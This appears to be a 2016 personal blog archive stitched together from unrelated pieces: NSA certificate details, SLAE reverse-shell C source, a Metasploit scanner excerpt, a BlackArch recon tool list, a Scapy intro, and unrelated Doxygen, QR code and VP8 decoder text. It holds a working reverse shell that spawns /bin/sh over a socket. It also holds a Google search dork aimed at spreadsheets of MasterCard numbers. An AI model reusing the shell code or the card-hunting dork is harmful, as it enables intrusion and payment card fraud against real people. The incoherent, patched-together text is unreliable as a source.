Friday, September 2, 2016

https://ssl-tools.net/subjects/e7283e531dbea071ab46d31bc35076989a9795a5

emsm-gh1-uea10.nsa.gov

C=US
O=U.S. Government
OU=DoDPKINSA/CSS
CN=emsm-gh1-uea10.nsa.gov
Fingerprints: d9fcc417c2
Issuer:
DOD ID SW CA-37
Serial:
12177
Not valid before:
2016-04-12 14:40­:26 UTC
Not valid after:
2019-04-13 14:40­:26 UTC
Key size:
2048
Signature Algorithm:
sha256WithRSAEnc­ryption
authorityKeyIdentifier:
keyid:16:24:7E:F­7:2D:C1:EF:92:3F­:BE:44:E7:54:5E:­E9:FE:17:BA:F3:A­1
subjectKeyIdentifier:
53:D9:A5:2D:B9:A­C:82:A0:F3:12:59­:BE:C5:5B:A9:63:­D6:81:83:25
authorityInfoAccess:
CA Issuers - URI­:http://crl.disa­.mil/sign/DODIDS­WCA_37.cer­OCSP - URI:http:­//ocsp.disa.mil
keyUsage:
Digital Signatur­e, Key Encipherm­ent
crlDistributionPoints:
Full Name:­ URI:http://crl­.disa.mil/crl/DO­DIDSWCA_37.crl
subjectAltName:
DNS:emsm-gh1-uea­10.nsa.gov
certificatePolicies:
Policy: 2.16.840­.1.101.2.1.11.39
extendedKeyUsage:
TLS Web Server A­uthentication, T­LS Web Client Au­thentication, 1.­3.6.1.5.5.8.2.2

Certificates

Fingerprint Issuer Serial Public Key Download Tools
d9fc­c417­c29a­037d­ac90­aea5­f178­e91d­59ec­9862DOD ID SW CA-371217­7d9fcc417c2

Create shellcode for a tcp reverse shell (SLAE)

shell_reverse_tcp.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include
#include
#include
#include
#include
#include
#include
 
int main(void) {
    int sockfd;         // file descriptor for socket
    int lportno = 12345;    // listener port
    struct sockaddr_in serv_addr; // {2,str[14]}
    char *const params[] = {"/bin/sh",NULL};
    char *const environ[] = {NULL};
 
    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET; // 2
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // localhost
    serv_addr.sin_port = htons(lportno);  // little endian
    connect(sockfd, (struct sockaddr *) &serv_addr, 16);
    // redirect stdout and stderr
    dup2(sockfd,0); // stdin
    dup2(0,1); // stdout
    dup2(0,2); // stderr
    execve("/bin/sh",params,environ);

 
 
 
YOU NEED TO KNOW WHERE TO GO:
 
 

endpoint_mapper

The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.
msf > use auxiliary/scanner/dcerpc/endpoint_mapper 
msf auxiliary(endpoint_mapper) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    135              yes       The target port
   THREADS  1                yes       The number of concurrent threads
In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work.

https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/ 

Server signature , how to get it ?

Server signature is now available for everyone, i'll just show with pictures where to get it and how to use it.
Thats pretty simple.

Go to serverlist , choose the server you are interested in , check bottom infos to get the signature code.
(click on the picture to see fullsize)



Once you clicked on server signature you should get this :



Copy the code & insert it to your signature for example , using the " Insert Image" function

Which gives :



Tips : select your image(double click on it) then add a link example : http://et.trackbase.net/server/41109/
So if you click on your signature , you are redirected to your server page.

Just add two numbers, separated by two periods, with no spaces, into the search box along with your search terms. "mastercard 0..9999999999999999 filetype:xls"

should he place xls..or xks ...
I don't think is going to find nothing xls...because that is of course offline...so he needs a java reader ONLINE tool




Doxygen

Generate documentation from source code

Doxygen is the de facto standard tool for generating documentation from annotated C++ sources, but it also supports other popular programming languages such as C, Objective-C, C#, PHP, Java, Python, IDL (Corba, Microsoft, and UNO/OpenOffice flavors), Fortran, VHDL, Tcl, and to some extent D.
Doxygen can help you in three ways:
  1. It can generate an on-line documentation browser (in HTML) and/or an off-line reference manual (in $\mbox{\LaTeX}$) from a set of documented source files. There is also support for generating output in RTF (MS-Word), PostScript, hyperlinked PDF, compressed HTML, and Unix man pages. The documentation is extracted directly from the sources, which makes it much easier to keep the documentation consistent with the source code.
  2. You can configure doxygen to extract the code structure from undocumented source files. This is very useful to quickly find your way in large source distributions. Doxygen can also visualize the relations between the various elements by means of include dependency graphs, inheritance diagrams, and collaboration diagrams, which are all generated automatically.
  3. You can also use doxygen for creating normal documentation (as I did for the doxygen user manual and web-site).
Doxygen is developed under Mac OS X and Linux, but is set-up to be highly portable. As a result, it runs on most other Unix flavors as well. Furthermore, executables for Windows are available.

http://www.stack.nl/~dimitri/doxygen/ 


Google Hacking Database (GHDB)

Search the Google Hacking Database or browse GHDB categories

https://www.exploit-db.com/google-hacking-database/ 

Thursday, September 1, 2016

TODAY WE ARE SETTING A GAME...

ConfigGenerator

The ConfigGen utility can be used as an aid in setting the device configuration fuse settings.
Unzip the utility and place the file ConfigGen.exe in a directory of your choice. The software uses the MPASM '8bit_device.info' file as the source of its information, and can be set to use the MPASM, MPASMX, or Swordfish copy.
Config Generator Software
Make sure the software is pointing to the MPASM, MPASMX, or Swordfish Bin installation folder. If it is not, use the 'Change Folder...' button to point to the location of the file '8bit_device.info'. For MPLAB this is typically "C:\Program Files\Microchip\MPASM Suite" and for MPLABX it's "C:\Program Files\Microchip\MPLABX\mpasmx". Next, press the 'Load File' button. This will open the .info file and build a list of all PIC18 devices contained in it. Select your desired device from the 'Device' dropdown list and it will display all of the config fuses and their default settings.
Clicking the 'Setting' column for a config entry will show a dropdown list with all of the valid selections for that fuse.
When all config settings have been made, click the 'Generate' button and the program will generate source code with all of your selections (the 'Comments' checkbox will remove the descriptions and just leave the settings, if desired).
Selecting 'Copy to Clipboard' will dump the output window contents into the Windows clipboard, which you can then paste into a file using a text editor or the Swordfish IDE using 'Edit | Paste' (or Ctrl-V).
The 'Set Defaults' button will change all the settings back to the defaults provided in the .info file, with the exception of 'XINST', 'DEBUG', 'LVP', and 'IOL1WAY' (if present for the selected device). The program always sets these off.

BlackArch Linux Complete Tools List

BlackArch Linux Complete Tools List

https://www.blackarch.org/tools.html 

 

Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages.

Tool count: 23
BlackArch recon
Name Version Description Homepage
api-dnsdumpster 29.f8cce1f Unofficial Python API for http://dnsdumpster.com/.
basedomainname 0.1 Tool that can extract TLD (Top Level Domain), domain extensions (Second Level Domain + TLD), domain name, and hostname from fully qualified domain names.
bing-ip2hosts 0.4 Enumerates all hostnames which Bing has indexed for a specific IP address.
catnthecanary 7.e9184fe An application to query the canary.pw data set for leaked data.
cutycapt 10 A Qt and WebKit based command-line utility that captures WebKit's rendering of a web page.
dnsbrute 2.b1dc84a Multi-theaded DNS bruteforcing, average speed 80 lookups/second with 40 threads.
dnsenum 1.2.4.2 Script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
dnsrecon 0.8.9 Python script for enumeration of hosts, subdomains and emails from a given domain using google.
dnsspider 0.8 A very fast multithreaded bruteforcer of subdomains that leverages a wordlist and/or character permutation.
dnstracer 1.9 Determines where a given DNS server gets its information from, and follows the chain of DNS servers
dnswalk 2.0.2 A DNS debugger
domain-analyzer 0.8.1 Finds all the security information for a given domain name.
dradis 3.0.0.rc1 An open source framework to enable effective information sharing.
enum4linux 0.8.9 A tool for enumerating information from Windows and Samba systems.
facebot 23.57f6025 A facebook profile and reconnaissance system.
fbid 11.b8106f8 Show info about the author by facebook photo url.
flashlight 107.39594b5 Automated Information Gathering Tool for Penetration Testers.
geoedge 0.2 This little tools is designed to get geolocalization information of a host, it get the information from two sources (maxmind and geoiptool).
githack 6.b83a744 A `.git` folder disclosure exploit.
gitminer 29.e25f339 Tool for advanced mining for content on Github.
goodork 2.2 A python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line.
goofile 1.5 Command line filetype search
goog-mail 1.0 Enumerate domain emails from google.
gwtenum 7.f27a5aa Enumeration of GWT-RCP method calls.
halcyon 0.1 A repository crawler that runs checksums for static files found within a given git repository.
hasere 1.0 Discover the vhosts using google and bing.
idswakeup 1.0 A collection of tools that allows to test network intrusion detection systems.
intrace 1.5 Traceroute-like application piggybacking on existing TCP connections
ircsnapshot 94.cb02a85 Tool to gather information from IRC servers.
ivre 1027.1b9acae Network recon framework.
kacak 1.0 Tools for penetration testers that can enumerate which users logged on windows system.
lanmap2 127.1197999 Passive network mapping tool.
lbd 20130719 Load Balancing detector
ldapenum 0.1 Enumerate domain controllers using LDAP.
lft 3.76 A layer four traceroute implementing numerous other features.
linux-exploit-suggester 32.9db2f5a A Perl script that tries to suggest exploits based OS version number.
loot 51.656fb85 Sensitive information extraction tool.
machinae 61.67b9725 A tool for collecting intelligence from public sites/feeds about various security-related pieces of data.
mdns-recon 7.cf67423 An mDNS recon tool written in Python.
metagoofil 1.4b An information gathering tool designed for extracting metadata of public documents
missidentify 1.0 A program to find Win32 applications.
monocle 1.0 A local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network.
nasnum 5.df5df19 Script to enumerate network attached storages.
necromant 3.acbc448 Python Script that search unused Virtual Hosts in Web Servers.
neglected 8.68d02b3 Facebook CDN Photo Resolver.
netdiscover 0.3 An active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. It can be also used on hub/switched networks.
netmask 2.4.3 Helps determine network masks
nipper 0.11.7 Network Infrastructure Parser
nsec3walker 20101223 Enumerates domain names using DNSSEC
ntp-ip-enum 0.1 Script to pull addresses from a NTP server using the monlist command. Can also output Maltego resultset.
osinterator 3.8447f58 Open Source Toolkit for Open Source Intelligence Gathering.
parsero 81.e5b585a A robots.txt audit tool.
quickrecon 0.3.2 A python script for simple information gathering. It attempts to find subdomain names, perform zone transfers and gathers emails from Google and Bing.
recon-ng 4.8.1 A full-featured Web Reconnaissance framework written in Python.
revipd 5.2aaacfb A simple reverse IP domain scanner.
ripdc 0.2 A script which maps domains related to an given ip address or domainname.
sctpscan 34.4d44706 A network scanner for discovery and security.
shard 1.5 A command line tool to detect shared passwords.
simplyemail 505.159429f Email recon made fast and easy, with a framework to build on http://CyberSyndicates.com.
sipi 10.10f087f Simple IP Information Tools for Reputation Data Analysis.
smbcrunch 5.23ea4cc 3 tools that work together to simplify reconaissance of Windows File Shares.
smtp-user-enum 1.2 Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY or RCPT TO.
sn1per 116.58c25c7 Automated Pentest Recon Scanner.
spfmap 8.a42d15a A program to map out SPF and DKIM records for a large number of domains.
spiderfoot 2.7.0 The Open Source Footprinting Tool.
spoofcheck 16.8cce591 Simple script that checks a domain for email protections.
ssl-hostname-resolver 1 CN (Common Name) grabber on X.509 Certificates over HTTPS.
subdomainer 1.2 A tool designed for obtaining subdomain names from public sources.
sysdig 0.11.0 Open source system-level exploration and troubleshooting tool
theharvester 53.0f9a670 Python tool for gathering e-mail accounts and subdomain names from different public sources (search engines, pgp key servers).
tilt 90.2bc2ef2 An easy and simple tool implemented in Python for ip reconnaissance, with reverse ip lookup.
tinfoleak 3.6469eb3 Get detailed information about a Twitter user activity.
traceroute 2.1.0 Tracks the route taken by packets over an IP network
treasure 6.a91d52b Hunt for sensitive information through githubs code search.
twofi 2.0 Twitter Words of Interest.
vbrute 1.11dda8b Virtual hosts brute forcer.
waldo 28.a33de7a A lightweight and multithreaded directory and subdomain bruteforcer implemented in Python.
websearch 1.cce2384 Search vhost names given a host range. Powered by Bing..
whatweb 4188.f467aa2 Next generation web scanner that identifies what websites are running.
windows-exploit-suggester 26.493f96a This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target.
zgrab631.bb14ac8Grab banners (optionally over TLS).                                                                                                                                                                                                        

http://bt3gl.github.io/black-hat-python-infinite-possibilities-with-the-scapy-module.html 

 Black Hat Python: Infinite possibilities with the Scapy Module

This is a review about one of my favorites libraries in Python: Scapy, which is a very powerful packet manipulation resource.
Scapy is able to forge and decode packets of several protocols, send and capture them, match requests and replies, and much more. It can be used to handle most network tasks such as scanning, tracerouting, probing, attacks, network discovery, to name a few.
Before we start, make sure you have Scapy in your machine:
$ pip install scapy
You can test the installation firing up Scapy iteratively. For example, these are some useful functions:
$ scapy
Welcome to Scapy (2.2.0)
>>> ls()    ---> list protocols/layers
>>> lsc()   ---> list commands
>>> conf    ---> Display configurations
>>> help(sniff)     --> Help for a specific command
This post is divided as the following:

this is no news anyway...I have a passaport...uses a PIC....

How can I display a URL as an image in an excel cell?

How to convert website URL to QR Code online

HOW TO CONVERT URL TO QR CODE?

Just follow these easy steps:
1. Go to a URL code generator such as Scanova
2. Enter the website URL in the given field and click on Create my QR Code







how to make a qr code

Wednesday, August 31, 2016

CHECK OUT THE HARDWARE

Expanding VP8 Hardware Decoder for Full WebP Support

With the recent launch of WebP support in Chrome, Picasa and Gmail, we're happy to announce that the third generation G-Series 1 VP8 hardware decoder, called “Chip Shot,” now offers full 256 Megapixel support for WebP still images. The G-Series 1 is available for licensing at no cost through the WebM Project hardware page
Chip Shot is part of our new golf theme for VP8 hardware decoders, as we noticed that most of the engineers working on the G-Series decoder are very fond of the sport.
The G-Series 1 decoder offers both 1080p 30 frames per second WebM and 36.5 Megapixels per second WebP processing at around 100 MHz clock rate. It is a full hardware implementation, requiring a mere 2 MHz host CPU load even when processing 1080p video or any size WebP images. The decoder uses 380 kilogates of logic area and 52 kilobytes of embedded single-port memory. The logic consumes a negligible 27 mW of power at 1080p resolution, ensuring many hours of video playback time on battery-operated devices.
G-series 1 Block Diagram

Based on the previous releases of the silicon-proven G-Series 1 decoder IP, Chip Shot is a low-risk solution for anyone who wants to enable WebM and WebP support on their chipsets or SOCs. Including all G-Series 1 versions that support WebM, we have released over 50 decoders to our semiconductor partners worldwide to date.

NATO maps (1)